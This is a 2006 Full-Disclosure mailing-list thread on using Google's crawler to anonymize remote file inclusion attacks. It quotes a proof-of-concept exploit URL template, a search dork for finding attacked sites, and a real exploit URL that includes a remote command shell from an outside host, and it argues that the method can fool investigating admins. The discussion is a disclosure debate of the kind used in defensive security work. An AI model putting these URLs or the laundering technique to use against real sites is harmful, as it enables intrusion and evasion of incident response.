[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <e024ccca0611242201q10002430r49cc5717229c412e@mail.gmail.com>
Date: Sat, 25 Nov 2006 01:01:54 -0500
From: "Dude VanWinkle" <dudevanwinkle@...il.com>
To: endrazine <endrazine@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, Gadi Evron <ge@...uxbox.org>
Subject: Re: Anonymizing RFI Attacks Through Google
On 11/25/06, endrazine <endrazine@...il.com> wrote:
> Hi Gadi,
>
> I beg your pardon, but either I missed the purpose of this post, or you
> discovered hot water :
> this process of attack is a mere waste of time if one only reaches
> anonymity : in order to
> give google this new url to crawl, you'd have to either create a web
> page that points to this
> very page, or enter the url in the google database directly using their
> form. None of those two
> options are safer than attacking the website directly (google might vey
> well log your actions),
> so what's the point ?
>
a lot of people are used to seeing google spider tracks in their logs.
anonymizing your attack via google may make the admin investigating
the attack think that a malfunctioning web bot was responsible for the
attack, or they may skim over the entire incident accidentally.
JMO
-JP<who thinks unabashed douchebaggery is a sign of character, not
weakness thereof>
> Also, most features in the web (like free emails, online scanning,
> pinging, lookup, etc., most
> applets allowing you to use irc, ftp or other services...) can be used
> to Anonymise (or at least "proxify")
> attacks. So why focusing on google and search engines specifically ?
>
> To be honest, my biggest issue with this post is its lack of
> technicallity : no offense, but I can hardly see
> anything that isn't public knowlege in this post.
>
> Regards,
>
>
> endrazine-
>
> Gadi Evron a écrit :
> > Noam Rathaus on using Google to anonymize attacks on websites:
> > http://blogs.securiteam.com/index.php/archives/746
> >
> > Anonymizing RFI Attacks Through Google
> > noam - November 23, 2006 on 12:03 pm
> >
> > Google can be utilized to hack into websites - actively exploiting them
> > (not information gathering by the use of "Google hacking", although that
> > is how most of the sites vulnerable to RFI attacks are found).
> >
> > By placing a URL on any web page, Google will find it, visit it and then
> > index it. With this mechanism, it is possible to anonymize attacks on
> > third party web sites through Google by the use of its crawler.
> >
> > PoC -
> > A malicious web page is constructed by an attacker, containing a URL built
> > like so:
> > 1. Third party site URI to attack.
> > 2. File inclusion exploit.
> > 3. Second URI containing a malicious PHP shell.
> >
> > Example URL:
> > http://victim-site/RFI-exploit?http://URI-with-malicious-code.php
> >
> > Google will harvest this URL, visit the site using its crawler and index
> > it.
> > Meaning accessing the target site with the URL it was provided and
> > exploiting it unwittingly for whoever planted it. It's a feature, not a
> > bug.
> >
> > This is currently exploited in the wild. For example, try searching Google
> > for:
> > inurl:cmd.gif
> >
> > And note, as an example:
> > www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
> > Which is no longer vulnerable.
> >
> > Why use a botnet when one can abuse the Google crawler, which is allowed
> > on most web sites?
> >
> > Notes:
> > 1. This attack was verified on Google, but there is no reason why it
> > should not work with other search engines, web crawlers and web spiders.
> > 2. File inclusions seem to tie in well with this attack anonymizer, but
> > there is no reason why others attack types can?t be used in a similar
> > fashion.
> > 3. The feature might also be used to anonymize communication, as a covert
> > channel.
> >
> > Noam Rathaus.
> > (with thanks to Gadi Evron and Lev Toger)
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists